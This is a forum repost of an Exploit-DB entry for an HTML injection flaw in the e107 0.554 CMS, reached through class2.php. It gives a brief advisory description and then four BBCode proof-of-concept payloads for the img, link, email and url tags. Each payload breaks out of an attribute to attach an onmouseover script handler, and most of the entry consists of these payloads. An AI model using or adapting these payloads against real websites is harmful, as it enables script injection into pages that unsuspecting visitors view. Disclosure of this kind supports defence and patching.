Exploit e107 Website System 0.554 - HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22958
Проверка EDB
  1. Пройдено
Автор
PETE FOSTER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-07-25
Код:
source: https://www.securityfocus.com/bid/8279/info

The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site.

[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[email][/email] - [email]/[email protected]" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]
 
Источник
www.exploit-db.com

Похожие темы